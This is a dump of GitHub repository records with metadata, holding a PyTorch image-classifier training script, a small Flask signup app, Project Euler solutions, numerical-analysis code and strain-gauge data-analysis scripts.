learning_rate)\n \n \n return model , optimizer ,criterion \n\n \nmodel,optimizer,criterion = nn_setup(structure, dropout, hidden_units, learning_rate)\n\n#DONE: Training of CNN with Training Data\n \ndef train_network(epochs = 8, print_every = 12, power = \"cuda\"):\n \n steps = 0\n loss_show=[]\n\n\n #DONE : train network model\n\n # Modell to power\n model.to(power)\n\n print(\"Starte Training mit Anzahl Epochen:\", epochs)\n # validieren\n\n for epoch in range(epochs):\n running_loss = 0\n for ii, (inputs, labels) in enumerate(trainloader):\n steps += 1\n\n inputs,labels = inputs.to(power), labels.to(power)\n\n optimizer.zero_grad()\n\n\n outputs = model.forward(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n\n if steps % print_every == 0:\n model.eval()\n vloss = 0\n accuracy=0\n\n\n for ii, (inputs2,labels2) in enumerate(validloader):\n optimizer.zero_grad()\n\n inputs2, labels2 = inputs2.to(power) , labels2.to(power)\n model.to(power)\n with torch.no_grad(): \n outputs = model.forward(inputs2)\n vloss = criterion(outputs,labels2)\n ps = torch.exp(outputs).data\n equality = (labels2.data == ps.max(1)[1])\n accuracy += equality.type_as(torch.FloatTensor()).mean()\n\n\n vloss = vloss / len(validloader)\n accuracy = accuracy*100/len(validloader)\n\n print('Epoch: {}/{}...'.format(epoch+1, epochs),\n 'Loss: {:.3f}...'.format(running_loss/print_every),\n 'Validation loss: {:.3f}...'.format(vloss),\n 'Validation accuracy: {:.3f}..'.format(accuracy))\n\n\n running_loss = 0\n\n\n \n print(\"-------------finished training--------------\")\n \n \ntrain_network(epochs,12,power) \n\n# DONE: Validation on the test set\n\ndef validation(testloader, power = \"cuda\"): \n \n print (\"Starte Validation\") \n \n correct = 0\n total = 0\n \n model.to(power)\n \n with torch.no_grad():\n for data in testloader:\n images, labels = data\n images, labels = images.to(power), labels.to(power)\n outputs = model(images)\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n \n print(\"-------------finished validating--------------\")\n print('Test Accuracy: %d %%' % (100 * correct / total))\n \nvalidation(testloader, power) \n\n# DONE: save model \n\nmodel.class_to_idx = train_data.class_to_idx\nmodel.cpu\n\ntorch.save({'structure' :'vgg16',\n 'hidden_units':4096,\n 'epochs': epochs,\n 'classifier' : model.classifier,\n 'optimizer': optimizer.state_dict(),\n 'state_dict': model.state_dict(),\n 'class_to_idx': model.class_to_idx},\n save_dir)\n\nprint(\"model is saved to:\", save_dir)\n\n " } ]
2
martinmac100/wk4_d2_SQL_Lab
https://github.com/martinmac100/wk4_d2_SQL_Lab
e68e0038c5f060bbd61a7e5c440422dab6c60035
36f3bd6588e64215e707dce863359896066a2ea9
daa71500d285bed8a37146ae60b5f049ef5d7294
refs/heads/master
2022-12-18T09:10:08.364045
2020-09-29T15:52:08
2020-09-29T15:52:08
299,665,727
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7915493249893188, "alphanum_fraction": 0.800000011920929, "avg_line_length": 21.25, "blob_id": "0670ba3ff4c737e6cd241278d9182f3a9f2761a8", "content_id": "d8e4f890942184e7d45d590659b8ad8a51c44af1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 355, "license_type": "no_license", "max_line_length": 58, "num_lines": 16, "path": "/console.py", "repo_name": "martinmac100/wk4_d2_SQL_Lab", "src_encoding": "UTF-8", "text": "import pdb\nfrom models.album import Album\nfrom models.artist import Artist\nimport repositories.album_repository as album_repository\nimport repositories.artist_repository as artist_repository\n\n# album_repository.delete_all()\n# artist_repository.delete_all()\n\nartist1 = Artist(\"Jarvis\", \"Cocker\")\nartist_repository.save(artist1)\n\n# artist2\n\n\npdb.set_trace()" } ]
1
atwinkles/Codes
https://github.com/atwinkles/Codes
087ce8356122f22a6fb092838e36156409468737
4c84484272a287f2228a486f605bd993192359f5
17c1a662ec838d398172acc17bf1eab465709be8
refs/heads/master
2020-11-24T08:09:43.988958
2017-03-14T03:13:14
2017-03-14T03:13:14
67,221,308
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5818058252334595, "alphanum_fraction": 0.5872369408607483, "avg_line_length": 51.60714340209961, "blob_id": "68ecfee8060e75d371b859858cc8ea1a54dee13c", "content_id": "8bc330eacf8e57463af096f2d3877b44847902d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1473, "license_type": "no_license", "max_line_length": 96, "num_lines": 28, "path": "/README.md", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "# Codes-\nA collection of the various codes I have developed throughout college.\n----------------------------------------------------------------------\n\nMATLAB:\n\n1. bisec.m - A MATLAB function that utilizes the bisection method to find the\n zeroes in functions. \n2. orbitaltrajectory.m - A MATLAB function (in development) that will model the orbits of\n satellites around Earth.\n3. newton.m - A MATLAB function that utilizes Newton's method to approximate\n zeroes in functions.\n4. steffensen.m - A MATLAB function that utilizes the Steffensen method to approximate\n zeroes in functions.\n\nMathematica:\n\n1. Surface2.nb - A Mathematica module designed to take a parametrized surface and \n return values of importance for differential geometry.\n2. OrbitalTrajectory.nb - A Mathematica module (in development) that will model the orbits\n of satellites around Earth and generate Keplerian elements.\n\nPython:\n\n1. Project Euler - A collection of all of my Project Euler codes written in Python. \n These codes are solely to demonstrate coding skills - if you are\n working on Project Euler I highly encourage you NOT to look at these\n as they take the fun out of the problems!\n" }, { "alpha_fraction": 0.3963133692741394, "alphanum_fraction": 0.5069124698638916, "avg_line_length": 11.764705657958984, "blob_id": "a55eaca0af02a0cc5264f0b0b25d7a4a57590922", "content_id": "556b6aaf03eade684ec7c9f3d8898e189c50c18f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 217, "license_type": "no_license", "max_line_length": 26, "num_lines": 17, "path": "/Python/Project Euler/006_sumsquare.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "\"\"\"\nresults = 0\nfor i in range(1,101):\n for j in range(1,101):\n results += i*j\n\nfor k in range(1,101):\n results -= k**2\nprint(results)\n\"\"\"\n\nn = 100\na = n*(n+1)/2\nb = (2*n+1)*(n+1)*n/6\n\nr = a^2+b\nprint(r)\n" }, { "alpha_fraction": 0.5592705011367798, "alphanum_fraction": 0.5775076150894165, "avg_line_length": 18.352941513061523, "blob_id": "80d37d22f048c3bee05c61bb0d8d47868dc39ab6", "content_id": "05c64e0ceb846612394d2aafb4691a0eb003f039", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 329, "license_type": "no_license", "max_line_length": 96, "num_lines": 17, "path": "/Python/Project Euler/016_power_digit_sum.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\n\ndef digit_sum(a,b):\n k = a**b\n summerino = 0\n j = str(k)\n for i in j:\n summerino += int(i)\n return summerino\n\nstart = time.time()\na = 2\nb = 1000\nk = digit_sum(a,b)\nelapsed = (time.time() - start)\n\nprint \"\\nThe sum of %s^%s's digits is %s, which was computed in %s seconds!\\n\" % (a,b,k,elapsed)\n" }, { "alpha_fraction": 0.5730858445167542, "alphanum_fraction": 0.5846867561340332, "avg_line_length": 18.590909957885742, "blob_id": "f857db5ed213d469d8d3a10421eb24c96faaeae9", "content_id": "93957b3ce5ac24d93603d9194fef5793f0563ba7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 431, "license_type": "no_license", "max_line_length": 98, "num_lines": 22, "path": "/Python/Project Euler/020_factorial_digit_sum.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\n\ndef factorial(n):\n fac = n\n for i in range(1,n):\n fac *= n-i\n return fac\n\ndef factorial_digit_sum(n):\n k = factorial(n)\n j = str(k)\n count = 0\n for i in j:\n count += int(i)\n return count\n\nstart = time.time()\nm = 100\nresult = factorial_digit_sum(m)\nelapsed = (time.time() - start)\n\nprint \"\\nThe sum of digits of %s! is %s, which was computed in %s seconds.\\n\" % (m,result,elapsed)\n" }, { "alpha_fraction": 0.490601509809494, "alphanum_fraction": 0.5357142686843872, "avg_line_length": 21.16666603088379, "blob_id": "5eb73eacf0fe65ef173261f5b0365f2c9972c1a8", "content_id": "509ced71a55a24110918cbe8a75a749f843f7257", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 532, "license_type": "no_license", "max_line_length": 118, "num_lines": 24, "path": "/Python/Project Euler/014_collatz_sequence.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\n\ndef collatz(n):\n count = 1\n while n > 1:\n if n % 2 == 0:\n n = n/2\n count += 1\n else:\n n = 3*n + 1\n count += 1\n return count\n\nstart = time.time()\nresult = [13]\nfor a in range(1,1000000):\n if collatz(a) > collatz(result[-1]):\n result.append(a)\n\n#print(result[-1])\n#print(collatz(result[-1]))\n\nelapsed = (time.time() - start)\nprint 'The result %s with a chain of length %s was computing in %s seconds' % (result[-1],collatz(result[-1]),elapsed)\n" }, { "alpha_fraction": 0.5531914830207825, "alphanum_fraction": 0.6808510422706604, "avg_line_length": 14.666666984558105, "blob_id": "97064f2421c3c35c74c93a27350021ff659aa425", "content_id": "16c9bbb38d341e504715fe6c958408865ede3f95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47, "license_type": "no_license", "max_line_length": 26, "num_lines": 3, "path": "/Python/Project Euler/031_coin_sums.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time, numpy\n\n1p = numpy.poly1d([1]*200)\n" }, { "alpha_fraction": 0.4566929042339325, "alphanum_fraction": 0.5118110179901123, "avg_line_length": 14.875, "blob_id": "da2d36704a49be44f01da6146c3b58f9e15aa91f", "content_id": "d58833e02db132df03a631dc5d1d9c4f8f8fd395", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 254, "license_type": "no_license", "max_line_length": 36, "num_lines": 16, "path": "/Python/Project Euler/003_largestprime.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import numpy as np\n\ni = 600851475143\n\nresults = []\n\nfor j in range(2,int(np.sqrt(i))):\n while i % j == 0:\n i = i/j\n if results.count(j) == True:\n continue\n else:\n results.append(j)\n\nr = max(results)\nprint(r)\n" }, { "alpha_fraction": 0.45355191826820374, "alphanum_fraction": 0.4972677528858185, "avg_line_length": 13.076923370361328, "blob_id": "c00f2617c759e348d71aab7734024fca2ab9f4c0", "content_id": "649b06eee55691a2448f72d2589bf4c6965ee9de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 183, "license_type": "no_license", "max_line_length": 25, "num_lines": 13, "path": "/Python/Project Euler/001_threefives.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "results = []\n\nfor i in range(1000): \n if i % 3 == 0:\n results.append(i)\n elif i % 5 == 0:\n results.append(i)\n else:\n continue\n\ns = sum(results)\n\nprint(s)\n" }, { "alpha_fraction": 0.486868679523468, "alphanum_fraction": 0.5494949221611023, "avg_line_length": 15.5, "blob_id": "a3ae7edf9f7f85a828b70ab34de4c8c840ce9ce4", "content_id": "4b87e95201fa465761cc3d1c62730279ecd5199f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 495, "license_type": "no_license", "max_line_length": 35, "num_lines": 30, "path": "/Python/Project Euler/045_tri_pent_hex.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\n\ndef tri(n):\n return n*(n+1)/2\n\ndef pent(n):\n return n*(3*n-1)/2\n\ndef hexi(n):\n return n*(2*n-1)\n\ntrivalues = []\npentvalues = []\nhexvalues = []\n\nfor i in range(286,10000):\n trivalues.append(tri(i))\n\nfor i in range(166,10000):\n pentvalues.append(pent(i))\n\nfor i in range(144,10000):\n hexvalues.append(hexi(i))\n\nfor i in hexvalues:\n for j in pentvalues:\n for k in trivalues:\n if (i == j) & (i == k):\n print k\n break\n" }, { "alpha_fraction": 0.4803149700164795, "alphanum_fraction": 0.5157480239868164, "avg_line_length": 12.11111068725586, "blob_id": "7ccdaed5981ed221c8667d5edccb1a767dae2b35", "content_id": "279e6f43627df7821afd91d5957bf16b042d7516", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 254, "license_type": "no_license", "max_line_length": 83, "num_lines": 18, "path": "/Python/Project Euler/025_fibonacci_digit.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\r\n\r\na = 1\r\nb = 1\r\nc = 2\r\n\r\ni = 3\r\n\r\nstart = time.time()\r\n\r\nwhile len(str(c)) < 1000:\r\n\ta = b\r\n\tb = c\r\n\tc = b + a\r\n\ti += 1\r\n\r\nelapsed = (time.time() - start)\r\nprint \"\\nThe index of %d is %d. This was computed in %d seconds!\\n\" % (c,i,elapsed)\r\n" }, { "alpha_fraction": 0.41055718064308167, "alphanum_fraction": 0.47800585627555847, "avg_line_length": 16.947368621826172, "blob_id": "9ec9bf0ef99c1410141b4124490a5e208a415ed8", "content_id": "4974890219e3140c31b562eb1d4cbb4c8f51cea9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 341, "license_type": "no_license", "max_line_length": 48, "num_lines": 19, "path": "/Python/Project Euler/007_10001prime.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import math\n\ncount = 0\n\ndef is_prime(n):\n if n % 2 == 0 and n > 2:\n return False\n for i in range(3, int(math.sqrt(n)) + 1, 2):\n if n % i == 0:\n return False\n else:\n return True\n\nfor i in range (2,20000000):\n if is_prime(i):\n count += 1\n if count == 10001:\n print(i)\n break\n" }, { "alpha_fraction": 0.6609686613082886, "alphanum_fraction": 0.6723646521568298, "avg_line_length": 26, "blob_id": "136cbf98cb6a9dfc36092819d82e1635e7fb5b10", "content_id": "416a4ada79410cfd515caea416cfddd9d98057d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 351, "license_type": "no_license", "max_line_length": 130, "num_lines": 13, "path": "/Python/Project Euler/015_lattice_paths.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import math,time\n\ndef lattice_routes(m,n):\n k = math.factorial(m + n)/(math.factorial(n)*math.factorial(m))\n return k\n\nstart = time.time()\nm = 20\nn = 20\nfinal = lattice_routes(m,n)\nelapsed = (time.time() - start)\n\nprint \"The solution to the number of lattices paths for a %s x %s grid is %s and was computed in %s seconds\" % (m,n,final,elapsed)\n" }, { "alpha_fraction": 0.43247127532958984, "alphanum_fraction": 0.4382183849811554, "avg_line_length": 30.636363983154297, "blob_id": "ae0d5567416b9002b7cde35634bc44e3f720f44a", "content_id": "1ce2a25af36e096e08637a15c256e3c37d3e2382", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 696, "license_type": "no_license", "max_line_length": 108, "num_lines": 22, "path": "/Python/Numerical Analysis/numerical.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\nimport numpy as np\n\ndef bisect(f,a,b,S,T):\n if np.sign(np.polyval(f,a)) == np.sign(np.polyval(f,b)):\n print \"\\nError: f(a) and f(b) have the same signs.\"\n else:\n i = 0\n while i <= S:\n e = b - a\n e /= 2\n c = a + e\n if abs(np.polyval(f,c)) < T:\n print \"\\nThe solution is %d. The computation was a success after %d iterations!\\n\\n\" % (c,i)\n break\n i += 1\n if np.sign(np.polyval(f,a)) == np.sign(np.polyval(f,c)):\n a = c\n else:\n b = c \n if i == S+1:\n print \"\\nMethod failed after %d iterations.\\n\\n\" % (S)\n" }, { "alpha_fraction": 0.5701754093170166, "alphanum_fraction": 0.5964912176132202, "avg_line_length": 18.826086044311523, "blob_id": "01f898c7c93eac3fcde38e0034637ce27ffdfeb6", "content_id": "b2a9171488702a5db3a024f5fe0315451de98acc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 456, "license_type": "no_license", "max_line_length": 154, "num_lines": 23, "path": "/Python/Project Euler/030_digit_fifth.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\n\ndef digit_fifth(n):\n k = str(n)\n tot = 0\n for i in k:\n tot += (int(i))**5\n return tot\n\nstart = time.time()\n\nres = []\nfor i in range(2,10000000):\n if i == digit_fifth(i):\n res.append(i)\n\ntotal = 0\nfor i in res:\n total += i\n\nelapsed = (time.time() - start)\n\nprint \"\\nThe sum of all numbers which are equal to the sum of the fifth power of their digits is %d. This was computed in %d seconds!\\n\" % (total,elapsed)\n" }, { "alpha_fraction": 0.599571704864502, "alphanum_fraction": 0.6788008809089661, "avg_line_length": 24.94444465637207, "blob_id": "c7505b75eaae6f32339f7a9e34a10b2616d201c9", "content_id": "b588f94d870aedd6c73d0e25c2c970e0ba61688e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 467, "license_type": "no_license", "max_line_length": 194, "num_lines": 18, "path": "/Python/Project Euler/040_champernowne_constant.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\n\nstart = time.time()\n\nchampernowne = \"\"\n\ncount = 0\n\nwhile count < 1000000:\n count += 1\n champernowne += str(count)\n\n#print champernowne\nprint (int(champernowne[0])* int(champernowne[9])* int(champernowne[10**2-1]) * int(champernowne[10**3-1]) * int(champernowne[10**4-1]) * int(champernowne[10**5-1]) * int(champernowne[10**6-1]))\n#print champernowne[10]\n\nelapsed = (time.time() - start)*1000\nprint \"This was computed in %d miliseconds\" % (elapsed)\n" }, { "alpha_fraction": 0.420895516872406, "alphanum_fraction": 0.5223880410194397, "avg_line_length": 16.63157844543457, "blob_id": "b51f853be6f15f64b6bd61dd18ee2a7123d14aab", "content_id": "42d70ba6e51334ae5099dd5b1a93ab9f9a95c0ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 335, "license_type": "no_license", "max_line_length": 36, "num_lines": 19, "path": "/Python/Project Euler/005_smallestmultiple.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "'''\nresults = []\nresults2 = []\nfor i in range(1,10000000):\n for j in range(1,21):\n if i % j == 0:\n results.append(i)\n else:\n continue\n \n if results.count(i) == 20:\n results2.append(i)\nr = min(results2)\n#print(results)\nprint(r)\n'''\n\nanswer = 2*2*2*2*3*3*5*7*11*13*17*19\nprint(answer)\n" }, { "alpha_fraction": 0.590395450592041, "alphanum_fraction": 0.6271186470985413, "avg_line_length": 19.764705657958984, "blob_id": "c831b5b5c45d0d55b76177a6574c986131c1d794", "content_id": "4f38783b7c34370f38e0b26f4a4d9700b203fc51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 354, "license_type": "no_license", "max_line_length": 79, "num_lines": 17, "path": "/Python/Project Euler/048_self_powers.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\n\ndef self_power(n):\n return n**n\n\ndef series(n):\n result = 0\n for i in range(1, n+1):\n result += self_power(i)\n return result\n\nstart = time.time()\nfinal = series(1000)\nsfinal = str(final)[len(str(final))-10:]\nelapsed = (time.time() - start)\n\nprint \"The result, %s, was computed in %d miliseconds\" % (sfinal, elapsed*1000)\n\n" }, { "alpha_fraction": 0.3885135054588318, "alphanum_fraction": 0.45270270109176636, "avg_line_length": 15.44444465637207, "blob_id": "d576939593e010d2335f64f13d8a284ac0322d07", "content_id": "11edfe3b77c7c5c1dd7867cee50decfe49621093", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 296, "license_type": "no_license", "max_line_length": 34, "num_lines": 18, "path": "/Python/Project Euler/002_fibonacci.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "def fib(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fib(n-1) + fib(n-2)\n\nresult = []\n\nfor i in range(1000):\n if fib(i) < 4000000:\n if fib(i) % 2 == 0:\n result.append(fib(i)) \n else:\n break\nr = sum(result)\nprint(r)\n" }, { "alpha_fraction": 0.48826292157173157, "alphanum_fraction": 0.5164319276809692, "avg_line_length": 16.75, "blob_id": "97ddb841d617e09a9d3fc1e7faf9b46586a75488", "content_id": "8be3bdff9ff2d2f3717aadc3b51ca2ccfa0f9d61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 639, "license_type": "no_license", "max_line_length": 153, "num_lines": 36, "path": "/Python/Project Euler/034_digit_fac.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\n\ndef fac(n):\n if n == 0:\n return 1\n elif n == 1:\n return 1\n else:\n tot = 1\n while n > 1:\n tot *= n\n n -= 1\n return tot\n\ndef digit_fac(n):\n k = str(n)\n tot = 0\n for i in k:\n tot += fac(int(i))\n\n return tot \n\nstart = time.time()\n\nres = []\nfor i in range(3,10000000):\n if i == digit_fac(i):\n res.append(i)\n\ntotal = 0\nfor i in res:\n total += i \n\nelapsed = (time.time() - start)\n\nprint \"\\nThe sum of all numbers which are equal to the sum of the factorial of their digits is %d. This was computed in %d seconds!\\n\" % (total, elapsed)\n" }, { "alpha_fraction": 0.2908163368701935, "alphanum_fraction": 0.3877550959587097, "avg_line_length": 31.66666603088379, "blob_id": "9ae6b06d6a085b2ecec92569812369b67e0ef0d8", "content_id": "0d209d0ed64eefa66875e09a57f79dc7e781d454", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 196, "license_type": "no_license", "max_line_length": 63, "num_lines": 6, "path": "/Python/Project Euler/009_triple.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "for a in range(0,700):\n for b in range(0,700):\n for c in range(0,700):\n if a + b + c == 1000 and (a**2) + (b**2) == (c**2):\n print(a*b*c)\n break\n" }, { "alpha_fraction": 0.4534161388874054, "alphanum_fraction": 0.5093167424201965, "avg_line_length": 15.100000381469727, "blob_id": "a88e7e0f04c472a383fa21457cc4955564b5358e", "content_id": "d4f2b6f006b5a879a49d34f0c5f58dfada9ad218", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 161, "license_type": "no_license", "max_line_length": 38, "num_lines": 10, "path": "/Python/Project Euler/004_largestpalindrome.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "results = []\n\nfor j in range(1000):\n for k in range(1000):\n if str(j*k) == str(j*k)[::-1]:\n results.append(j*k)\n\nr = max(results)\n\nprint(r)\n" } ]
21
ibbad/BucketListApp
https://github.com/ibbad/BucketListApp
9dbec49ebe736fa106b7989ec1ceb1f7a993ef61
00af5312a9f3f5ba7d34770b3dcf2b8095967a24
0348db5cfe8f0a20986dab9861908ccdac1c99ad
refs/heads/master
2021-01-19T06:02:54.529506
2016-06-26T07:00:57
2016-06-26T07:00:57
61,977,747
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6285979747772217, "alphanum_fraction": 0.6285979747772217, "avg_line_length": 28.108108520507812, "blob_id": "c882ec60b3977fb237a926c4dd8810b2239cf5e8", "content_id": "9a0d38b2262a9c4cb3fefc190124eb2fcb1752ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1077, "license_type": "no_license", "max_line_length": 74, "num_lines": 37, "path": "/app/main/views.py", "repo_name": "ibbad/BucketListApp", "src_encoding": "UTF-8", "text": "import json\nfrom . import main\nfrom .. import db\nfrom ..models import User\nfrom flask import render_template, request\n\n\[email protected]('/')\ndef index():\n return render_template('index.html')\n\n\[email protected]('/signupform')\ndef show_signup():\n return render_template('signup.html')\n\n\[email protected]('/signup', methods=['POST', 'GET'])\ndef signup():\n # Read form values from incoming request\n _name = request.form['inputName']\n _email = request.form['inputEmail']\n _password = request.form['inputPassword']\n\n # validate values\n if _name and _email and _password:\n if User.query.filter_by(email=_email).first() is not None:\n return json.dumps(\n {'error': '<span>User already registered.<span>'})\n # add user to database.\n user = User(name=_name, email=_email, password=_password)\n db.session.add(user)\n db.session.commit()\n return json.dumps(\n {'html': '<span>User successfully registered.<span>'})\n else:\n return json.dumps({'html': '<span>Enter required inputs.</span>'})\n" } ]
1
XieJiongyan/SJTU-EM341-experience2
https://github.com/XieJiongyan/SJTU-EM341-experience2
29a18ed05401161516905868dbba77c770ddb98c
55a56f63d70370bcdbea51e93206b3106e3614e4
d358b65e4a100564fc5186dcbf7fc63a327c9b11
refs/heads/main
2023-02-11T02:22:35.772368
2020-12-25T07:00:08
2020-12-25T07:00:08
324,306,872
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4541003704071045, "alphanum_fraction": 0.535699725151062, "avg_line_length": 32.52112579345703, "blob_id": "221e587e1bad68223d5a3cb063962e5d422fbc3a", "content_id": "6f89ed05916dc99932aa81efa2ad4c757f067936", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2553, "license_type": "no_license", "max_line_length": 99, "num_lines": 71, "path": "/q2.py", "repo_name": "XieJiongyan/SJTU-EM341-experience2", "src_encoding": "UTF-8", "text": "import pandas as pd \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\nfrom sklearn import linear_model \r\n\r\n# 由实验一得到的已知数据\r\nE = 214.6e9\r\nI_y = 29.9e-6 * 9e-4\r\n# import data\r\ndf = pd.read_csv('input/data123.csv')\r\nexperiments = np.arange(1, 7)\r\ndf_exprmnts = [0] * 7\r\nfor i in experiments:\r\n df_exprmnts[i] = df[df['experiment'] == i]\r\n\r\n# sgs = [2, 5, 3, 7, 8, 11, 9]\r\n# sg_places = 1e-2 * np.array([[2, 0], [1.79, 0], [0.5, 0], [0,0.6],[0,2.6], [0, 2.78], [0, 4.6]])\r\nsgs = [3, 7, 8, 9]\r\nsg_places = 1e-2 * np.array([[0.5, 0], [0,0.6],[0,2.6], [0, 4.6]])\r\n# sgs = [2, 3, 7, 8, 9]\r\n# sg_places = 1e-2 * np.array([[2, -0.05], [0.5, -0.05], [-0.05,0.6],[-0.05,2.6], [-0.05, 4.6]])\r\n# print(sg_places)\r\nhat_z_dir = np.array([np.cos(122.78 * np.pi / 180), np.sin(122.78 * np.pi / 180)])\r\nhat_y_dir = np.array([np.cos(32.78 * np.pi / 180), np.sin(32.78 * np.pi / 180)])\r\n\r\ncentroid = 1e-2 * np.array([0.89, 1.39])\r\n# print(centroid)\r\nhat_zs = [0] * len(sgs)\r\nfor i in range(len(sgs)):\r\n hat_zs[i] = np.dot(hat_z_dir, sg_places[i] - centroid)\r\n print(hat_zs[i])\r\n\r\nprint('places')\r\nprint(np.dot(hat_z_dir, [0, 0.05] - centroid))\r\n# print(np.dot(hat_y_dir, [0, 0.050] - centroid))\r\nprint(np.dot(hat_z_dir, [0, 0] - centroid))\r\n# print(np.dot(hat_y_dir, [0, 0] - centroid))\r\nprint(np.dot(hat_z_dir, [0.040, 0] - centroid))\r\n# print(np.dot(hat_y_dir, [0.040, 0] - centroid))\r\n\r\nBC = []\r\n# for expr in [1, 2]:\r\n#解决中文显示问题\r\nplt.rcParams['font.sans-serif'] = ['KaiTi'] # 指定默认字体\r\nplt.rcParams['axes.unicode_minus'] = False # 解决保存图像是负号'-'显示为方块的问题\r\n\r\nfor expr in [1, 2]:\r\n nd_dif = np.array(df_exprmnts[expr][['sg' + str(i) for i in sgs]])\r\n # print(nd_dif)\r\n for i in range(4):\r\n nd_dif[i, :] = nd_dif[i + 1, :] - nd_dif[i, :]\r\n nd_dif = np.delete(nd_dif, -1, axis = 0)\r\n # print(nd_dif)\r\n for i in range(4):\r\n plt.plot(hat_zs, [j * 1e-6 * E - 800. / 81e-6 for j in nd_dif[i, :]])\r\n # print([j * 1e-6 * E - 800. / 81e-6 for j in nd_dif[i, :]])\r\n clf = linear_model.LinearRegression()\r\n clf.fit([[i] for i in hat_zs], [j * 1e-6 * E - 800. / 81e-6 for j in nd_dif[i, :]])\r\n M_I_y = clf.coef_ \r\n # print(type(M_I_y))\r\n BC += [np.abs(M_I_y[0] * I_y / 800.)]\r\n # print(BC)\r\n\r\n\r\nprint(BC)\r\nprint(type(pd.Series(BC)))\r\nprint(pd.Series(BC).describe())\r\nplt.legend(['试验' + str(i + 1) for i in range (8)])\r\nplt.xlabel(r'$z^*$')\r\nplt.ylabel(r'弯矩引起的应力$\\sigma_x$(Pa)')\r\nplt.show()\r\n" }, { "alpha_fraction": 0.42809996008872986, "alphanum_fraction": 0.5058934688568115, "avg_line_length": 29.62686538696289, "blob_id": "fdbd077adba5eb4ef96e5485b7c7dfdaba2c41d6", "content_id": "d9f47b68770dfa727404465886536c2becbf4186", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2143, "license_type": "no_license", "max_line_length": 95, "num_lines": 67, "path": "/q3method1.py", "repo_name": "XieJiongyan/SJTU-EM341-experience2", "src_encoding": "UTF-8", "text": "import pandas as pd \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\nfrom sklearn import linear_model \r\n\r\n# 由实验一得到的已知数据\r\nE = 214.6e9\r\nI_y = 29.9e-6 * 9e-4\r\nA = 81e-6\r\n# import data\r\ndf = pd.read_csv('input/data123.csv')\r\nexperiments = np.arange(1, 7)\r\ndf_exprmnts = [0] * 7\r\nfor i in experiments:\r\n df_exprmnts[i] = df[df['experiment'] == i]\r\n\r\n# sgs = [2, 3, 7, 8, 9]\r\n# sg_places = 1e-2 * np.array([[2, -0.05], [0.5, -0.05], [-0.05,0.6],[-0.05,2.6],[-0.05, 4.6]])\r\nsgs = [3, 7, 8, 9]\r\nsg_places = 1e-2 * np.array([[0.5, 0.01], [0,0.6],[0,2.6],[0, 4.6]])\r\n\r\nr2s = []\r\nmses = []\r\nfor deg in np.arange(1, 90):\r\n #\r\n xs = []\r\n ys = 